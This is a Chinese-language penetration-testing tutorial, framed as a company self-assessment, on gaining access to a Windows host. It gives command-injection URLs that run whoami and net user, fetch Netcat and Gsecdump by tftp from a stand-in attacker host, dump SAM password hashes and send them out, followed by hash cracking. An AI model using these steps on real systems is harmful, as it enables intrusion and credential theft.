在文章《企業(yè)如何自行檢查漏洞之掃描與枚舉》中我們講到如何找到企業(yè)系統中的漏洞，并有效地揭示這些漏洞。時到今日，破壞一個網絡或信息系統的基本過程并沒有太多變化。這些步驟基本說來就是：1、執(zhí)行偵察；2、掃描和枚舉；3、獲得訪問權；4、提升特權；5、維持訪問并掩蓋蹤跡。下面，我們就具體介紹一下第三步“獲得訪問權”。

獲得訪問權

現在可以決定是否對SMB服務器進行有效攻擊了。遠程利用某種有漏洞服務的一個常用工具是Metasploit，這是一個開源的靈活且易于使用的漏洞利用框架。

與Nessus很相似，Metasploit擁有Web界面和一個支持用戶選擇目標或網絡的向導。安全評估者可以跳過向導，開始遠程利用SMB服務器的漏洞，然后，你會看到一個在遠程機器上的命令提示符，而這正是黑客的最愛。在“自攻”期間，真希望你的系統不會達到這一步。

記住，不管是出于什么目的和意圖，任何服務或端口都可能存在足以破壞主機的漏洞。你應當檢查掃描報告中發(fā)現的所有問題，并不斷地重復這些步驟直至檢查完每一個項目。

例如，掃描報告出現這樣的內容：

2869/tcp - http Microsoft HTTP API httpd 1.0 (SSDP/UPnP)

雖然Nmap可能無法獲得哪些程序正在運行的信息，但這兒需要注意的關鍵字母是“API”，即“應用編程接口”。因而，我們幾乎可以肯定：這里有一個通過Windows的HTTP服務而起作用的特定應用程序。

定制的應用程序帶來了特殊困難，因為并沒有哪種特定工具可以攻擊這種程序。在這兒，不妨考慮一下Fuzzing這種軟件測試技術，它一般是自動化或半自動化的，能夠將非法的、非正常的或隨機數據提交給某個計算機程序的輸入。然后，監(jiān)視該程序的例外情況，如崩潰或無法實現內建的代碼功能，或者查找潛在的內存泄露等。Fuzzing確實重視定制的應用或不尋常的程序實現。

還有，請求訪問http://123.123.123.123:2869返回了一個404“not found(未發(fā)現)”的錯誤。這就表明，有可能存在我們可以訪問的目錄或命令，而這正是JBroFuzz顯示身手的地方。

使用JBroFuzz,你可以通過任何方法攻擊一個特定的應用程序，其中包括用戶代理字符串(用來辨別瀏覽器版本以及向用戶所訪問的網站服務器提供某些系統信息的細節(jié))、方法，以及get和post變量等。在很多情況下，這不是一個能否攻破目標的問題，而是什么時候攻破的問題。并非所有的錯誤或例外都會導致遠程的漏洞利用，但評估人員應當仔細檢查任何問題，以便于發(fā)現風險。本文的測試涉及到HTTP，但許多協議都足以導致攻擊網絡服務和本地服務。如果你需要更多的靈活性，不妨考慮Peachfuzzer。

在本文的測試中，作者發(fā)現了這個URL：

http://123.123.123.123:2869/cmd=echo%20%22log%20entry%20%251%22%20%3E%20ap p.log%20

如果我們使用一個WebScarab或JBroFuzz編碼器之類的工具來解碼這個URL，就可以看出，“cmd”變成了“log entry%1”>app.log

這里看起來是通過操作系統的命令行將消息發(fā)送給app.log文件，從而建立一個日志文件，也就是說，Web服務器的服務正在調用文件系統。這種類型的直接訪問可以創(chuàng)建某些漏洞掃描器可能遺漏的漏洞利用條件。

這也會給攻擊者提供了機會，但首先還得解決其它問題。有多數情況下，Web并不會以管理員特權的方式來運行。不管你如何獲得系統的訪問權，都可使用這些命令。這些命令僅要求你能夠訪問命令解釋器。

>test命令可以驗證我們的攻擊是否提供反饋(例如，并不把test當作內部或外部命令、可操作的程序或批處理文件)。

如果我們得到錯誤消息，就會從攻擊中獲得結果。

在我們的Web攻擊中，我們可以簡單地在瀏覽器地址欄中輸入：http://123.123.123.123:2869/?cmd=test

這會導致瀏覽器返回一個錯誤。否則，就意味著我們不會得到實時反饋。

下一步的測試是查看我們是誰：

http:// 123.123.123.123:2869/?cmd=whoami

此時的響應會告訴我們用戶賬戶的名稱，即Web服務的運行賬戶。現在，我們看看組成員身份是什么：

http:// 123.123.123.123:2869/?cmd=net user

這時的響應與下圖類似：

可以看出，此時并沒有以管理員身份運行，這會給黑客帶來問題。事實上，在黑客獲得了系統訪問后，特權提升幾乎總會成為攻擊者的首要目標。攻擊者可通過多種方法實現此目標，其中包括暴力破解管理員賬戶。有時，攻擊者可能會利用操作系統或已安裝軟件中的本地漏洞來擴大訪問權。

在此例中，我們(攻擊者)擁有了操作系統的命令訪問權，而且我們也可以訪問文件系統。因而，我們可以通過迂回戰(zhàn)術來獲得管理員賬戶。為有效地占領主機(包括攻克管理員賬戶)，需要做點兒準備工作。

首先，我們建立一個TFTP(簡單文件傳輸協議)服務器。當然，這項工作很簡單，網上的教程有很多，在此不贅述。然后，下載下面的幾種工具，并將其放到TFTP的根文件夾中：

Netcat：黑客工具的瑞士軍刀;Gsecdump，允許用戶從SAM(安全賬戶管理器)數據庫中析取口令哈希。使用操作系統命令行漏洞，我們將工具下載到目標機器中：http://123.123.123.123:2869/?cmd=tftp attackercomputer.com GET *

使用Gsecdump,可以從系統中析取哈希，并導入到一個可發(fā)送給攻擊者機器的文本文件中。http://123.123.123.123:2869/?cmd= gsecdumpv2b5.exe –a > hashes.txt

http://123.123.123.123:2869/?cmd=tftp attackyourcomputer.com PUT hashes.txt hashes.txt

現在，我們需要做的是破解哈希并得到口令。

回到攻擊電腦上，我們可以在Windows下安裝Cain & Abel 或在Linux上安裝John the Ripper。

在使用Cain&Abel的測試中，我們可以輕松地導入文本文件，并可以實施強力攻擊或字典攻擊。(強力攻擊嘗試每一個字符組合，而字典攻擊必須擁有一個包含單詞或單詞變體的文件。)我們還可以使用預編譯強力攻擊和字典攻擊的彩虹表。當然，每種方法都有其好處和缺點，而你應當首先嘗試字典攻擊，因為其速度很快。但這種攻擊不太全面。

有時，要破解一個口令可能需要幾天或幾星期的時間。如果一個口令使用了復雜規(guī)則，那么，你可能畢生也無法破解。